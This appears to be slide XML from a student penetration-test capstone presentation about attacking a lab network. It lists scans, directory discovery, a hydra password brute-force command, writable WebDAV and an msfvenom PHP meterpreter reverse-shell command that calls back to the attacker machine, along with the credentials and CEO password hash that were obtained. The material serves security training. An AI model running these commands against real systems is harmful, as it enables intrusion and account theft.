              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>identified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p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76" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{663BDC58-2C87-4161-AF0D-D854A5650081}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
              </a:tblGrid>
              <a:tr h="403225">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r>
              <a:tr h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>server1/Capstone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192.168.1.105</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Vulnerable Server/ T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>arget</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Machine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ELK /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>SIEM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Server</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192.168.1.100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Log Aggregation/Collection and Report Generation</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Kali</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192.168.1.90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Attack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Server / Pentest Server</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Windows HyperV (ML-RefVm-684427)</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192.168.1.1 / 10.0.0.4</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Gateway / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Host Machine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Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p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83" name="Google Shape;1083;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84" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{663BDC58-2C87-4161-AF0D-D854A5650081}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2765200"/>
                <a:gridCol w="2765200"/>
                <a:gridCol w="2765200"/>
              </a:tblGrid>
              <a:tr h="345325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">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613525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="F8F8F8"/>
                          </a:highlight>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache HTTP Server CVE-2021-41773</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="F8F8F8"/>
                        </a:highlight>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="9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rgbClr val="9900FF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t># Dirb http://192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="9900FF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>(192.168.1.105/company_folders/secret_folder)</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>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i="1" lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Found hidden directories and login files with exact instructions to access the VSI server were found in plain text.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="9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462650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> Numerous open ports (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>lack of principle of least privilege)</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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rgbClr val="9900FF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t># Nmap -sT -sV 192.168.1.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Discovery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> of exposed ports that could be exploited and hidden server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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915300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute Force Attack - Password Crack</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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t/>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900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9900FF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t># hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /wordlists/common.txt</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Gained direct access to an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>employee's</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> login </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>credentials and in addition we gained the CEO’s password hash, giving us access to their account as well.</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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613525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open access to directories on web server</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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rgbClr val="9900FF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>dav://192.168.1.105/webdav/</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Permission to write and upload files, including </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> payloads to the company server.</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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4425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache HTTP Server CVE-2021-41773 (port 80 open for scans) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Meterpreter Reverse TCP Host Connection</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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rgbClr val="9900FF"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t># Msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=80 &gt;&gt; shell.php</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:srgbClr val="9900FF"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>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900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>vulnerability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> can be used for remote code execution when mod_cgi is enabled. An attacker can execute arbitrary code.</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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Exploitation: Apache HTTP Server CVE-2021-41773</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;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91" name="Google Shape;1091;p61"/>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1"/>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The Web Content Scanner, “Dirb” was used from the  Kali server to search for any open directories.</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1094" name="Google Shape;1094;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095" name="Google Shape;1095;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 name="Google Shape;1096;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097;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098" name="Google Shape;1098;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9" name="Google Shape;1099;p61"/>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1"/>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We found the following open directories that we could navigate and get into.</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000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http://192.168.1.105/server-status</a:t>
            </a:r>
            <a:endParaRPr sz="10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000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>http://192.168.1.105/webdav/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1102" name="Google Shape;1102;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03" name="Google Shape;1103;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4" name="Google Shape;1104;p61"/>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61"/>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Commands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9900FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Dirb http://192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1106" name="Google Shape;1106;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10136" l="-565" r="47184" t="-1451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="2356825"/>
            <a:ext cx="2669876" cy="2593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Numerous Open Ports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p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13" name="Google Shape;1113;p62"/>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62"/>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Used a Network Scanner called NMAP, to scan the network surrounding the vulnerable machine.</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Command:</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9900FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nmap -sT -sV 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>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15" name="Google Shape;1115;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Google Shape;1116;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17" name="Google Shape;1117;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8" name="Google Shape;1118;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1119" name="Google Shape;1119;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20" name="Google Shape;1120;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1" name="Google Shape;1121;p62"/>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62"/>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Running this command allowed us to find all 4 VMs on the network plus any of their corresponding ports that were open for exploitation.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;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25" name="Google Shape;1125;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6" name="Google Shape;1126;p62"/>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62"/>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t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="3913" r="23884" t="22576"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267825" y="1480575"/>
            <a:ext cx="3447674" cy="39822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